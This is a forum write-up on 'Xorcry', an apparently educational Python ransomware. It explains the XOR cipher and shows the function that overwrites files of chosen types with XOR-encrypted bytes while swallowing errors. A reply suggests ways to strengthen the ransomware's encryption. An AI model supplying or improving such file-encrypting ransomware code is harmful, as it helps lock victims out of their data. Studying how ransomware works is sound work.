XORCry - a simple python ransomware


Before we start here is the full code if you want to check it yourself Xorcry

Xorcry

Xorcry is open-source ransomware written in python3 to explain how actually ransomware or a crypter with a given cryptography algorithm works.

Why?

as a curious person, I really love to understand how things get to work deeply, and one of the questions that I’ve been asking for a long time was how does the ransomware work? after a lot of disappointing research to give my question a clear answer, I started diving into cryptography algorithms and malware understanding, so without any further ado let’s leave this boring introduction aside a bit and go with the cool part.

How Does Xorcry Work?

first of all, you must make sure that I did this tool only for educational purposes, secondly, if you are a cryptographer you will find this write-up boring you.

there are a lot of cryptography algorithms you can use to make ransomware but I’m not going to explain them for the reason that I didn’t use any known crypto algorithm, in fact, what I did is reading files as binary and xor them with a given key and this is what called xor cipher, but wait, I said xor cipher hmmm what is this? well, this will be our next topic.

Xor Cipher

I’ll assume that you have a background in Logic gates and what are they, but if you don’t I want you to take a deep look at this
article from Wikipedia :

well as you noticed In the xor operation, the output is true when the inputs differ. In other words, the xor operation means either one but not both or none.

Below you can find the principles of xor (^ denotes the xor operation):

0 ^ 0 = 0
0 ^ 1 = 1
1 ^ 0 = 1
1 ^ 1 = 0

xor cipher employs the xor logical operation in order to encrypt data. First, a random key is generated or chosen by you. Then, the xor operation is performed using the key so that encrypted data is created. In order to decrypt, the same key should be used and the xor operation should be run again.

xor operation uses the same key for both encryption and decryption operations. That is why it is known as symmetric encryption.

Code Explaining

before covering the code explanation, I’ll assume again that you have the basics of the programming language Python in order to understand The rest of the code because I will cover only the most important function which is :

def encrypt(self , f) :
		''' If the file's extension is one of the lists declared above then start XoRing '''
		if self.check_ex(f) :
			try :
				with open(f , mode = "rb") as _file :
					rd = bytearray(_file.read())
				for n , v in enumerate(rd) :
					rd[n] = v ^ self.key
				with open(f , mode = "wb") as _nf :
					_nf.write(rd)
				''' This exception is especially for file permissions '''
			except :
				pass

the first line I will talk about is the operation of reading the file we want to encrypt in binary mode and declaring a variable where we will put the binary data as a list using the built-in function bytearray(), I found this article useful for those who want to understand how does the bytearray() work :

after that, there is a for loop to edit the list by performing the xor operation for each element in the list with the given key and finally rewrite the file we have opened previously with the new encrypted data.

Contact Me

For Any Questions, You Can Find Me on This Platform:

Disclaimer

This program must be used for legal purposes! I am not responsible for anything you do with it.

3 Likes

Dang thats amazing I never heard of Xor Cipher let alone ever thought of using logic gates for encryption

1 Like

Yeah I know right? I’ll bet he doesn’t know that there’s only 256 possible ways to decrypt the data given the ciphertext.

1 Like

I know that, that’s why I wrote that “simple” word within the title of the article buddy :slight_smile:

Oh yeah, that’s how Richard Feynman believes people learn best; he is credited with stating that “what I cannot create, I do not understand.” I looked through the source code, and I like it :smiley: — it’s short and simple, how software should be made.

So I’m looking at your encryption method:

	def encrypt(self , f) :

		''' If the file's extension is one of the list declared above then start XoRing '''

		if self.check_ex(f) :

			try :
				with open(f , mode = "rb") as _file :
					rd = bytearray(_file.read())
				for n , v in enumerate(rd) :
					rd[n] = v ^ self.key
				with open(f , mode = "wb") as _nf :
					_nf.write(rd)

				''' This exception is especially for file permissions '''

			except :
				pass

And like you said (and as the title of your malware implies), it’s using a basic XOR cipher to encrypt files on the filesystem; fun stuff. I think what you could do to improve it (if you want) is try to make a pseudo-one time pad to encrypt each file.

So I would approach it by using a calculus series to generate an irrational number. Here’s an example:

equation

and then set the function’s “k” to generate a number large enough where its number of digits match the filesize (in bytes ofc :wink: ). Then you can split the number into individual digits and XOR each byte with its corresponding digit (this may take up a lot of computing power lol). If you need to decrypt, you can just XOR again for each byte to the function’s corresponding digit place.

Just my silly, unsolicited advices if you want to add to Python ransomware :wink: — also if I didn’t explain it well I’m sorry; will be happy to clarify it if you want! :smiley: